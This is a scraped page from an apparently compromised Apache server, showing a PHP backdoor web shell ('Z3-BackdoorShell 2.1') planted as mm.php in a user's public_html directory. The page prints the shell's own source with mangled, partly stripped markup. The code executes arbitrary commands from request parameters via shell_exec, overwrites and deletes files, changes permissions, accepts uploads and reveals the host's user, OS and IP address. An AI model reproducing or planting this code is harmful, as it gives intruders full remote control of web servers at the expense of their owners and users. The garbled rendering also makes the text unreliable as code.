/**************************************************************************************/ // _____ ____ _ _ ____ _ _ _ // // ___|___ / | __ ) __ _ ___| | ____| | ___ ___ _ __/ ___|| |__ ___ | | |// // |_ / |_ \ _____| _ \ / _` |/ __| |/ / _` |/ _ \ / _ \| '__\___ \| '_ \ / _ \| | |// // / / ___) |_____| |_) | (_| | (__| < (_| | (_) | (_) | | ___) | | | | __/| | |// // /___|____/ |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_| |____/|_| |_|\___||_|_|// /**************************************************************************************/ 2.1
User : umudio OS : Linux Server IP Address: 104.152.111.241 Software : Apache
File manager | Shell | Protect The shell Directory : /home/umudio/public_html/repo/ Filename : mm.php Fullpath : /home/umudio/public_html/repo/mm.php document.location='?path=" . addslashes($uploaddir) . "'"; } else { echo ""; }} } if (isset($_POST['edit'])) { $source = $_POST['source']; $source = str_replace("\\'","'",$source); $source = str_replace("\\\\","\\",$source); $source = str_replace('\\"','"',$source); $source = str_replace('<','<',$source); $source = str_replace('>','>',$source); $source = str_replace('&','&',$source); $source = str_replace('uiiplastzo','+',$source); $a = $source; echo $a; $myFile = $_POST['path']; $fh = fopen($myFile, 'w') or die("can't open file"); fwrite($fh, $a); fclose($fh); die(); } if (isset($_POST['action'])) { if (isset($_POST['path'])) { if (isset($_POST['mod'])) { $mod = intval($_POST['mod'],8); chmod($_POST['path'], $mod); die(); }}} if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $oz = 'win'; } else { $oz = 'linux'; } $action = 'fm'; if(isset($_GET['action'])) { $action = $_GET['action']; } if($action =='dt') { if(isset($_GET['path'])) { if(isset($_GET['file'])) { unlink($_GET['path'] . $_GET['file']); echo ''; }} }; if($action =='fs') { $path = $_GET['path']; $command = $_GET['cm']; $command = str_replace("amp;","",$command); $command = str_replace("<","<",$command); $command = str_replace(">",">",$command); $command = str_replace("\n","",$command); $path = str_replace("\n","",$path); shell_exec('cd ' . $path . ' && ' . $command); echo ''; } if($action =='dtd') { if(isset($_GET['path'])) { if(isset($_GET['file'])) { rmdir($_GET['path'] . $_GET['file']); echo ''; }} }; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $os = 1; $dd = 'cd'; } else { $os = 2; $dd = 'pwd'; } if(isset($_POST['start'])) { if($os ==1) { $command = 'cd'; } else { $command = 'pwd'; } $output = shell_exec($command); echo $output; die(); } if(isset($_POST['command'])) { if(isset($_POST['path'])) { $command = $_POST['command']; $command = str_replace("amp;","",$command); $command = str_replace("<","<",$command); $command = str_replace(">",">",$command); $command = str_replace("\n","",$command); $path = $_POST['path']; $path = str_replace("\n","",$path); echo shell_exec('cd ' . $path . ' && ' . $command . ' && echo z3r0separator && ' . $dd); die(); } } ?> /**************************************************************************************/ // _____ ____ _ _ ____ _ _ _ // // ___|___ / | __ ) __ _ ___| | ____| | ___ ___ _ __/ ___|| |__ ___ | | |// // |_ / |_ \ _____| _ \ / _` |/ __| |/ / _` |/ _ \ / _ \| '__\___ \| '_ \ / _ \| | |// // / / ___) |_____| |_) | (_| | (__| < (_| | (_) | (_) | | ___) | | | | __/| | |// // /___|____/ |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_| |____/|_| |_|\___||_|_|// /**************************************************************************************/ '; echo 'User : ' . get_current_user() . " \n"; echo 'OS : ' . PHP_OS . " \n"; echo ''; echo 'Server IP Address: ' . $_SERVER['SERVER_ADDR'] . "\n"; echo 'Software : ' . $_SERVER["SERVER_SOFTWARE"] . "\n"; echo ''; ?> File manager | Shell | Protect The shell
$dirs[$i]/"; } $iterator = new DirectoryIterator($path); echo ''; echo ''; foreach ($iterator as $fileinfo) { if ($fileinfo->isDir()) { $octal_perms = substr(sprintf('%o', $fileinfo->getPerms()), -4); echo '\n"; } } foreach ($iterator as $fileinfo) { if ($fileinfo->isFile()) { $octal_perms = substr(sprintf('%o', $fileinfo->getPerms()), -4); $msize = filesize($path . '/' . $fileinfo->getFilename()); $msize = $msize / 1000; $size = "$msize"; $size = str_replace(".",",",$size); $size = str_replace("0,0","",$size); $size = str_replace("0,","",$size); echo '\n"; } } echo '
nameview edit delete Perms IsWritableLast ModifiedSize
[' . $fileinfo->getFilename() . ']##getFilename() . '")>' . $octal_perms . '' . $fileinfo->isWritable() . "" . date ("F d Y H:i:s.", filemtime($path . '/' . $fileinfo->getFilename())) . "Dir
' . $fileinfo->getFilename() . '###getFilename() . '")>' . $octal_perms . '' . $fileinfo->isWritable() . "" . date ("F d Y H:i:s.", filemtime($path . '/' . $fileinfo->getFilename())) . "" . $size . " Bytes
'; ?> Change dir: Execute :
Upload : Click Upload $path \n"; echo "Filename : $file \n"; echo "Fullpath : $path$file \n\n"; $source = str_replace("<","<",$source); $source = str_replace(">",">",$source); echo $source; } if($action=='ed') { $path = ""; $file = ""; if(isset($_GET['path'])) { $path = $_GET['path'] . '/'; } if(isset($_GET['file'])) { $file = $_GET['file']; } $source = file_get_contents($path . $file); echo "Directory : $path \n"; echo "Filename : $file \n"; echo "Fullpath : $path$file \n\n"; $source = str_replace("<","<",$source); $source = str_replace(">",">",$source); $source = str_replace("&","&",$source); $source = str_replace("<","<",$source); $source = str_replace(">",">",$source); $source = str_replace(">",">",$source); $source = str_replace("<","<",$source); echo '' . $source . '


'; ?>